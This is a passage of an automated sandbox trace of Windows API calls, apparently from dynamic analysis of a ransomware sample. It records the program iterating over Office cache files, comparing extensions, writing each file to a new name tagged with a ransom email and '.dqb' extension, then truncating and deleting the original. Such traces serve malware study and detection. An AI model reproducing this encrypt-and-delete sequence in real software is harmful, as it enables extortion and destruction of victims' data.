Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1 [0034.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.367] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.367] lstrlenW (lpString=".doc") returned 4 [0034.367] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.367] lstrlenW (lpString=".docx") returned 5 [0034.367] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.367] lstrlenW (lpString=".pdf") returned 4 [0034.368] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString=".xls") returned 4 [0034.368] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString=".xlsx") returned 5 [0034.368] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.368] lstrlenW (lpString=".ppt") returned 4 [0034.368] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.368] lstrlenW (lpString=".zip") returned 4 [0034.368] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.368] lstrlenW (lpString=".rar") returned 4 [0034.368] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString=".bz2") returned 4 [0034.368] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString=".7z") returned 3 [0034.368] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.368] lstrlenW (lpString=".dbf") returned 4 [0034.368] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.368] lstrlenW (lpString=".1cd") returned 4 [0034.368] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.368] lstrlenW (lpString=".jpg") returned 4 [0034.368] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.368] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.368] lstrlenW (lpString=".doc") returned 4 [0034.368] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString=".docx") returned 5 [0034.368] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.368] lstrlenW (lpString=".pdf") returned 4 [0034.368] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.368] lstrlenW (lpString=".xls") returned 4 [0034.369] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.369] lstrlenW (lpString=".xlsx") returned 5 [0034.369] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.369] lstrlenW (lpString=".ppt") returned 4 [0034.369] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.369] lstrlenW (lpString=".zip") returned 4 [0034.369] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.369] lstrlenW (lpString=".rar") returned 4 [0034.369] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.369] lstrlenW (lpString=".bz2") returned 4 [0034.369] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.369] lstrlenW (lpString=".7z") returned 3 [0034.369] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.369] lstrlenW (lpString=".dbf") returned 4 [0034.369] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.369] lstrlenW (lpString=".1cd") returned 4 [0034.369] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.369] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0034.369] lstrlenW (lpString=".jpg") returned 4 [0034.369] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.369] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.369] lstrlenW (lpString="Proofing.xml") returned 12 [0034.369] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.370] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=811) returned 1 [0034.370] CloseHandle (hObject=0x188) returned 1 [0034.370] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 0x2020 [0034.370] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.370] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.370] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.370] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.370] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.370] GetLastError () returned 0x0 [0034.370] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x32b, lpOverlapped=0x0) returned 1 [0034.372] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x330, lpOverlapped=0x0) returned 1 [0034.373] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0034.373] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.373] SetEndOfFile (hFile=0x180) returned 1 [0034.373] CloseHandle (hObject=0x180) returned 1 [0034.373] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.373] SetEndOfFile (hFile=0x188) returned 1 [0034.374] CloseHandle (hObject=0x188) returned 1 [0034.374] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.374] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.375] lstrlenW (lpString=".doc") returned 4 [0034.375] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".docx") returned 5 [0034.375] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0034.375] lstrlenW (lpString=".pdf") returned 4 [0034.375] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".xls") returned 4 [0034.375] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".xlsx") returned 5 [0034.375] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0034.375] lstrlenW (lpString=".ppt") returned 4 [0034.375] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.375] lstrlenW (lpString=".zip") returned 4 [0034.375] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.375] lstrlenW (lpString=".rar") returned 4 [0034.375] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".bz2") returned 4 [0034.375] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString=".7z") returned 3 [0034.375] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.375] lstrlenW (lpString=".dbf") returned 4 [0034.375] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.375] lstrlenW (lpString=".1cd") returned 4 [0034.375] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.375] lstrlenW (lpString=".jpg") returned 4 [0034.375] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.375] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.376] lstrlenW (lpString=".doc") returned 4 [0034.376] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString=".docx") returned 5 [0034.376] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0034.376] lstrlenW (lpString=".pdf") returned 4 [0034.376] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString=".xls") returned 4 [0034.376] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString=".xlsx") returned 5 [0034.376] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0034.376] lstrlenW (lpString=".ppt") returned 4 [0034.376] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.376] lstrlenW (lpString=".zip") returned 4 [0034.376] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.376] lstrlenW (lpString=".rar") returned 4 [0034.376] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString=".bz2") returned 4 [0034.376] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString=".7z") returned 3 [0034.376] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.376] lstrlenW (lpString=".dbf") returned 4 [0034.376] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.376] lstrlenW (lpString=".1cd") returned 4 [0034.376] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0034.376] lstrlenW (lpString=".jpg") returned 4 [0034.376] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.376] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.377] lstrlenW (lpString="Setup.xml") returned 9 [0034.377] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.377] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=5884) returned 1 [0034.377] CloseHandle (hObject=0x188) returned 1 [0034.377] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.377] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.377] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.377] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.377] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.377] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.377] GetLastError () returned 0x0 [0034.377] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x16fc, lpOverlapped=0x0) returned 1 [0034.379] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1700, lpOverlapped=0x0) returned 1 [0034.380] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0034.380] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.380] SetEndOfFile (hFile=0x180) returned 1 [0034.380] CloseHandle (hObject=0x180) returned 1 [0034.381] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.381] SetEndOfFile (hFile=0x188) returned 1 [0034.382] CloseHandle (hObject=0x188) returned 1 [0034.382] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.382] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.382] lstrlenW (lpString=".doc") returned 4 [0034.382] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.382] lstrlenW (lpString=".docx") returned 5 [0034.382] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.382] lstrlenW (lpString=".pdf") returned 4 [0034.382] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.382] lstrlenW (lpString=".xls") returned 4 [0034.382] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.382] lstrlenW (lpString=".xlsx") returned 5 [0034.382] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.382] lstrlenW (lpString=".ppt") returned 4 [0034.382] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.382] lstrlenW (lpString=".zip") returned 4 [0034.382] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.382] lstrlenW (lpString=".rar") returned 4 [0034.382] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString=".bz2") returned 4 [0034.383] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString=".7z") returned 3 [0034.383] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.383] lstrlenW (lpString=".dbf") returned 4 [0034.383] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.383] lstrlenW (lpString=".1cd") returned 4 [0034.383] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.383] lstrlenW (lpString=".jpg") returned 4 [0034.383] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.383] lstrlenW (lpString=".doc") returned 4 [0034.383] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString=".docx") returned 5 [0034.383] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.383] lstrlenW (lpString=".pdf") returned 4 [0034.383] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString=".xls") returned 4 [0034.383] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString=".xlsx") returned 5 [0034.383] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.383] lstrlenW (lpString=".ppt") returned 4 [0034.383] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.383] lstrlenW (lpString=".zip") returned 4 [0034.383] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.383] lstrlenW (lpString=".rar") returned 4 [0034.383] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString=".bz2") returned 4 [0034.383] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.383] lstrlenW (lpString=".7z") returned 3 [0034.384] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.384] lstrlenW (lpString=".dbf") returned 4 [0034.384] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.384] lstrlenW (lpString=".1cd") returned 4 [0034.384] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.384] lstrlenW (lpString=".jpg") returned 4 [0034.384] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.384] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.384] lstrlenW (lpString="Office32MUI.xml") returned 15 [0034.384] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.385] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1383) returned 1 [0034.385] CloseHandle (hObject=0x188) returned 1 [0034.385] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 0x2020 [0034.385] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.385] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.385] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.385] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.385] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.386] GetLastError () returned 0x0 [0034.386] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x567, lpOverlapped=0x0) returned 1 [0034.828] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x570, lpOverlapped=0x0) returned 1 [0034.830] ReadFile (in: hFile=0x188, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0034.830] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xf2, lpOverlapped=0x0) returned 1 [0034.830] SetEndOfFile (hFile=0x180) returned 1 [0034.831] CloseHandle (hObject=0x180) returned 1 [0034.832] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0034.832] SetEndOfFile (hFile=0x188) returned 1 [0034.833] CloseHandle (hObject=0x188) returned 1 [0034.833] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", 